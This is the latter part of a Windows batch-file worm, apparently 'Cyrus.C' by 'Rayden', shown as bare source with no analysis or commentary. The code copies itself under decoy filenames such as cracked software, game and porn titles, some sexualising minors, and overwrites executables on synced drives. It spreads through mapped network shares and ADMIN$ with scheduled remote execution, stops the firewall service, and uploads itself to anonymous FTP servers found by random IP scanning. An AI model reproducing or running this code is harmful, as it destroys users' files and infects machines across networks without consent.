copy %0 "%kaz%\Rapidshare Premium Account Generator.exe" &gt; nul
copy %0 "%kaz%\Rapidshare Premium Accounts.exe" &gt; nul
copy %0 "%kaz%\Rapidshare Unlimited Loader.exe" &gt; nul
copy %0 "%kaz%\Real Credit Cards.exe" &gt; nul
copy %0 "%kaz%\RPG Maker.exe" &gt; nul
copy %0 "%kaz%\Sado Maso SM Sex.exe" &gt; nul
copy %0 "%kaz%\Saw 5 V.exe" &gt; nul
copy %0 "%kaz%\Schoolgirl Fuck.exe" &gt; nul
copy %0 "%kaz%\Serials Archive.exe" &gt; nul
copy %0 "%kaz%\sex sex sex sex sex sex.exe" &gt; nul
copy %0 "%kaz%\Spore.exe" &gt; nul
copy %0 "%kaz%\Star Wars Episode 3 III.exe" &gt; nul
copy %0 "%kaz%\Steam Account Stealer.exe" &gt; nul
copy %0 "%kaz%\Steam Accounts.exe" &gt; nul
copy %0 "%kaz%\Storm Worm Sourcecode.exe" &gt; nul
copy %0 "%kaz%\Superscan.exe" &gt; nul
copy %0 "%kaz%\Symantec Norton Antivirus 2009.exe" &gt; nul
copy %0 "%kaz%\Symantec Norton Ghost 15.exe" &gt; nul
copy %0 "%kaz%\Teamspeak Spam.exe" &gt; nul
copy %0 "%kaz%\Teen Porn 16.exe" &gt; nul
copy %0 "%kaz%\The Matrix Reloaded.exe" &gt; nul
copy %0 "%kaz%\The Matrix Revolutions.exe" &gt; nul
copy %0 "%kaz%\The Sims 2.exe" &gt; nul
copy %0 "%kaz%\%cyrus%%c% Generator.exe" &gt; nul
copy %0 "%kaz%\Tune Up Utilities 2009.exe" &gt; nul
copy %0 "%kaz%\Ulead GIF Animator.exe" &gt; nul
copy %0 "%kaz%\Unreal Tournament.exe" &gt; nul
copy %0 "%kaz%\Video Codec Pack.exe" &gt; nul
copy %0 "%kaz%\Virtual PC 2008.exe" &gt; nul
copy %0 "%kaz%\Virus Generator.exe" &gt; nul
copy %0 "%kaz%\Visa Card Generator.exe" &gt; nul
copy %0 "%kaz%\VMWare Workstation.exe" &gt; nul
copy %0 "%kaz%\Warez Archive.exe" &gt; nul
copy %0 "%kaz%\Wargames 2 - The Dead Code.exe" &gt; nul
copy %0 "%kaz%\Webcam Spy.exe" &gt; nul
copy %0 "%kaz%\Website Defacer.exe" &gt; nul
copy %0 "%kaz%\Website Hacktool.exe" &gt; nul
copy %0 "%kaz%\Website Password Cracker.exe" &gt; nul
copy %0 "%kaz%\Winamp.exe" &gt; nul
copy %0 "%kaz%\Windows Genuine Removal Tool.exe" &gt; nul
copy %0 "%kaz%\Windows Rootkit.exe" &gt; nul
copy %0 "%kaz%\Windows Vista Original Maker.exe" &gt; nul
copy %0 "%kaz%\Windows XP Original Maker.exe" &gt; nul
copy %0 "%kaz%\Winrar Password Recovery.exe" &gt; nul
copy %0 "%kaz%\Wireshark.exe" &gt; nul
copy %0 "%kaz%\World of Warcraft.exe" &gt; nul
copy %0 "%kaz%\Worm Generator.exe" &gt; nul
copy %0 "%kaz%\wwwHack.exe" &gt; nul
copy %0 "%kaz%\XXX Hardcore Images.exe" &gt; nul
copy "%windows%\%system%\Mediaplayer\*" "%kaz%" &gt; nul
ping -n 2 127.0.0.1 &gt; nul
goto next
:end
cd /d %windows%
cd %system%
if exist temp.txt del /f /q temp.txt &gt; nul
if exist temp1.txt del /f /q temp1.txt &gt; nul
if exist temp2.txt del /f /q temp2.txt &gt; nul
set peer=true
if "%network%" == "true" goto inetshare
goto inetspr
:inetspr
ping -n 1 www.google.com &gt; nul
if "%errorlevel%" == "0" goto wuala
ping -n 6 127.0.0.1 &gt; nul
goto inetspr
:wuala
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
cd /d %%a\
if exist "Wuala\Release Notes" (
for /r %%e in (*.exe) do copy %0 "%%e" &gt; nul
for /r %%e in (*.scr) do copy %0 "%%e" &gt; nul
for /r %%e in (*.com) do copy %0 "%%e" &gt; nul
for /r %%e in (*.pif) do copy %0 "%%e" &gt; nul
for /r %%e in (*.bat) do copy %0 "%%e" &gt; nul
for /r %%e in (*.cmd) do copy %0 "%%e" &gt; nul
for /r /d %%b in (*app* *program* *tool*) do (
copy "%windows%\%system%\Mediaplayer\*" "%%b" &gt; nul
copy %0 "%%b\3D Gamestudio.exe" &gt; nul
copy %0 "%%b\Adobe Photoshop CS4.exe" &gt; nul
copy %0 "%%b\Matrix Screensaver.scr" &gt; nul
copy %0 "%%b\Microsoft Windows XP Professional.exe" &gt; nul
copy %0 "%%b\VMware Workstation.exe" &gt; nul
)
for /r /d %%c in (*game* *spiel*) do (
copy %0 "%%c\Counterstrike.exe" &gt; nul
copy %0 "%%c\Counterstrike Source.exe" &gt; nul
copy %0 "%%c\Crysis.exe" &gt; nul
copy %0 "%%c\GTA Grand Theft Auto 4 IV.exe" &gt; nul
copy %0 "%%c\Postal 2.exe" &gt; nul
copy %0 "%%c\Postal 3.exe" &gt; nul
copy %0 "%%c\Postal Fudge Pack.exe" &gt; nul
copy %0 "%%c\Unreal Tournament.exe" &gt; nul
)
for /r /d %%d in (*porn* *p0rn* *pron* *pr0n* *sex* *xxx*) do (
copy %0 "%%d\Gina Lisa Sextape 2.exe" &gt; nul
copy %0 "%%d\Teen porn 16.exe" &gt; nul
copy %0 "%%d\Gangbang.exe" &gt; nul
copy %0 "%%d\Porno Screensaver.scr" &gt; nul
copy %0 "%%d\XXX Images.exe" &gt; nul
)
)
)
:usenet
cd /d %windows%
cd %system%
net use&gt;"%windows%\%system%\user.txt"
set A=0
echo /xXEndofNetUseXx/&gt;&gt;"%windows%\%system%\user.txt"
echo /xXEndofNetUseXx/&gt;&gt;"%windows%\%system%\user.txt"
:useline
set /a A=A+1
more /e /p +%A% "%windows%\%system%\user.txt"&gt;"%windows%\%system%\user2.txt"
set /p use=&lt;"%windows%\%system%\user2.txt"
if "%use%" == "/xXEndofNetUseXx/" goto viewnet
echo %use% | find "\\" &gt; nul &amp;&amp; goto usecpy
goto useline
:usecpy
for /f "tokens=1* delims=\\" %%A in ("%use%") do set usec=%%B
for /f "tokens=1*" %%A in ("%usec%") do set usecp=%%A
for /f "tokens=1* delims=\\" %%A in ("%usecp%") do set remote=%%A
copy %0 "\\%usecp%\ntwrkmgr.exe" &gt; nul
if "%errorlevel%" == "0" goto usetime
net use "\\%usecp%" &gt; nul 2&gt;&amp;1
if not "%errorlevel%" == "0" goto useline
copy %0 "\\%usecp%\ntwrkmgr.exe" &gt; nul
if not "%errorlevel%" == "0" goto useline
goto usetime
:usetime
set hz=%time:~0,1%
set he=%time:~1,1%
set mz=%time:~3,1%
set me=%time:~4,1%
if "%mz%%me%" == "59" goto sethe
if "%me%" == "9" goto plusmz
set /a me=me+1
goto showtime
:sethe
if "%hz%%he%" == "19" goto plushz
if "%hz%%he%" == "23" goto plushe
set me=0
set mz=0
set /a he=he+1
goto showtime
:plusmz
set me=0
set /a mz=mz+1
goto showtime
:plushz
set hz=2
set he=0
set mz=0
set me=0
goto showtime
:plushe
set hz= 
set he=0
set mz=0
set me=0
goto showtime
:showtime
at \\%remote% %hz%%he%:%mz%%me% /interactive "\\%usecp%\ntwrkmgr.exe" /network
goto useline
:viewnet
if exist "%windows%\%system%\user.txt" del /f /q "%windows%\%system%\user.txt"
if exist "%windows%\%system%\user2.txt" del /f /q "%windows%\%system%\user2.txt"
net view&gt;"%windows%\%system%\viewer.txt"
set A=0
echo /xXEndofNetViewXx/&gt;&gt;"%windows%\%system%\viewer.txt"
echo /xXEndofNetViewXx/&gt;&gt;"%windows%\%system%\viewer.txt"
:viewline
set /a A=A+1
more /e /p +%A% "%windows%\%system%\viewer.txt"&gt;"%windows%\%system%\viewer2.txt"
set /p view=&lt;"%windows%\%system%\viewer2.txt"
if "%view%" == "/xXEndofNetViewXx/" goto loeschbew
echo %view% | find /i "\\" &gt; nul &amp;&amp; goto viewcpy
goto viewline
:viewcpy
set viewcp=%view: =%
copy %0 "%viewcp%\ADMIN$\ntwrkmgr.exe" &gt; nul
if "%errorlevel%" == "0" goto schedule
net use "%viewcp%\ADMIN$" &gt; nul 2&gt;&amp;1
if not "%errorlevel%" == "0" goto viewline
copy %0 "%viewcp%\ADMIN$\ntwrkmgr.exe" &gt; nul
if not "%errorlevel%" == "0" goto viewline
:schedule
set hz=%time:~0,1%
set he=%time:~1,1%
set mz=%time:~3,1%
set me=%time:~4,1%
if "%mz%%me%" == "59" goto sethe2
if "%me%" == "9" goto plusmz2
set /a me=me+1
goto showtime2
:sethe2
if "%hz%%he%" == "19" goto plushz2
if "%hz%%he%" == "23" goto plushe2
set me=0
set mz=0
set /a he=he+1
goto showtime2
:plusmz2
set me=0
set /a mz=mz+1
goto showtime2
:plushz2
set hz=2
set he=0
set mz=0
set me=0
goto showtime2
:plushe2
set hz= 
set he=0
set mz=0
set me=0
goto showtime2
:showtime2
at %viewcp% %hz%%he%:%mz%%me% /interactive "%viewcp%\ADMIN$\ntwrkmgr.exe" /network
goto viewline
:loeschbew
if exist "%windows%\%system%\viewer.txt" del /f /q "%windows%\%system%\viewer.txt"
if exist "%windows%\%system%\viewer2.txt" del /f /q "%windows%\%system%\viewer2.txt"
set network=true
if "%peer%" == "false" goto peer
goto inetshare
:inetshare
cd /d %windows%
cd %system%
if "%right%" == "noadmin" goto inetftpfw
:sharcheck
ping -n 1 www.google.com &gt; nul
if "%errorlevel%" == "0" goto getshare
ping -n 6 127.0.0.1 &gt; nul
goto sharcheck
:getshare
net share&gt;shares.txt
set A=0
echo /xXEndofNetShareXx/&gt;&gt;"%windows%\%system%\shares.txt"
echo /xXEndofNetShareXx/&gt;&gt;"%windows%\%system%\shares.txt"
:shareline
set /a A=A+1
more /e /p +%A% "%windows%\%system%\shares.txt"&gt;"%windows%\%system%\shares2.txt"
set /p share=&lt;"%windows%\%system%\shares2.txt"
if "%share%" == "/xXEndofNetShareXx/" goto crshare
set sharing=%share:&amp;=^^^&amp;%
echo %sharing%&gt;tmpshar.txt
find "ADMIN$" "tmpshar.txt" &gt; nul &amp;&amp; goto shareline
find "IPC$" "tmpshar.txt" &gt; nul &amp;&amp; goto shareline
findstr "^[A-Z]\$" "tmpshar.txt" &gt; nul &amp;&amp; goto shareline
for /f "tokens=1*" %%A in ("%sharing%") do set sharecpy=%%A
copy "%windows%\%system%\shared\*" "\\127.0.0.1\%sharecpy%" &gt; nul
goto shareline
:crshare
if exist "%windows%\%system%\shares.txt" del /f /q "%windows%\%system%\shares.txt"
if exist "%windows%\%system%\shares2.txt" del /f /q "%windows%\%system%\shares2.txt"
net share share /delete
net share share="%windows%\%system%\shared"
goto inetftpfw
:inetftpfw
if "%right%" == "admin" sc stop SharedAccess &gt; nul
:inetftp
ping -n 1 www.google.com &gt; nul
if "%errorlevel%" == "0" goto ftpspread
ping -n 6 127.0.0.1 &gt; nul
goto inetftp
:ftpspread
echo %random% &gt; nul
set min=0
set max=255
set /a E=min+(max-min+1)*%random%/32768
echo %random% &gt; nul
set min=0
set max=255
set /a F=min+(max-min+1)*%random%/32768
echo %random% &gt; nul
set min=0
set max=255
set /a G=min+(max-min+1)*%random%/32768
echo %random% &gt; nul
set min=0
set max=255
set /a H=min+(max-min+1)*%random%/32768
goto checkip
:checkip
ping -n 1 %E%.%F%.%G%.%H% &gt; nul
if not "%errorlevel%" == "0" goto inetftp
echo open %E%.%F%.%G%.%H%&gt;ftp.txt
echo anonymous&gt;&gt;ftp.txt
echo support@microsoft.com&gt;&gt;ftp.txt
echo dir . ftpdirlisttmp.txt&gt;&gt;ftp.txt
echo bye&gt;&gt;ftp.txt
ftp -i -s:ftp.txt&gt;ftplog.txt
findstr "^230" "ftplog.txt" &gt; nul &amp;&amp; goto writeacc
goto ftpdele
:ftpdele
if exist ftp.txt del /f /q ftp.txt &gt; nul
if exist ftplog.txt del /f /q ftplog.txt &gt; nul
if exist ftpdirlisttmp.txt del /f /q ftpdirlisttmp.txt &gt; nul
if exist ftpdirlist.txt del /f /q ftpdirlist.txt &gt; nul
if exist ftpdirlist2.txt del /f /q ftpdirlist2.txt &gt; nul
goto inetftp
:writeacc
findstr /i "^d" "ftpdirlisttmp.txt"&gt;"ftpdirlist.txt"
echo /Endofftp/&gt;&gt;ftpdirlist.txt
set A=0
set /p ftpfoldx=&lt;"%windows%\%system%\ftpdirlist.txt"
if "%ftpfoldx%" == "/Endofftp/" goto ftpdele
for /f "tokens=8*" %%A in ("%ftpfoldx%") do set ftpfold=%%B
if "%ftpfold%" == "." goto nextftpfold
if "%ftpfold%" == ".." goto nextftpfold
goto schreib
:nextftpfold
set /a A=A+1
more /e /p +%A% "%windows%\%system%\ftpdirlist.txt"&gt;"%windows%\%system%\ftpdirlist2.txt"
set /p ftpfoldx=&lt;"%windows%\%system%\ftpdirlist2.txt"
if "%ftpfoldx%" == "/Endofftp/" goto ftpdele
for /f "tokens=8*" %%A in ("%ftpfoldx%") do set ftpfold=%%B
if "%ftpfold%" == "." goto nextftpfold
if "%ftpfold%" == ".." goto nextftpfold
goto schreib
:schreib
if exist ftplog.txt del /f /q ftplog.txt &gt; nul
echo open %E%.%F%.%G%.%H%&gt;ftp.txt
echo anonymous&gt;&gt;ftp.txt
echo support@microsoft.com&gt;&gt;ftp.txt
echo cd "%ftpfold%"&gt;&gt;ftp.txt
echo BINARY&gt;&gt;ftp.txt
echo mput "%windows%\%system%\shared\3D Gamestudio.exe"&gt;&gt;ftp.txt
echo bye&gt;&gt;ftp.txt
ftp -i -s:ftp.txt&gt;ftplog.txt
if exist ftp.txt del /f /q ftp.txt &gt; nul
findstr "^226" "ftplog.txt" &gt; nul &amp;&amp; goto upall
goto nextftpfold
:upall
if exist ftplog.txt del /f /q ftplog.txt &gt; nul
echo open %E%.%F%.%G%.%H%&gt;ftp.txt
echo anonymous&gt;&gt;ftp.txt
echo support@microsoft.com&gt;&gt;ftp.txt
echo cd "%ftpfold%"&gt;&gt;ftp.txt
echo BINARY&gt;&gt;ftp.txt
echo mput "%windows%\%system%\shared\*.*"&gt;&gt;ftp.txt
echo bye&gt;&gt;ftp.txt
ftp -i -s:ftp.txt
if exist ftp.txt del /f /q ftp.txt &gt; nul
goto nextftpfold
:: Cyrus.C  by Rayden
:: THX to Perforin (Wuala Verbreitungs Idee)
</pre>
</body>
</html>
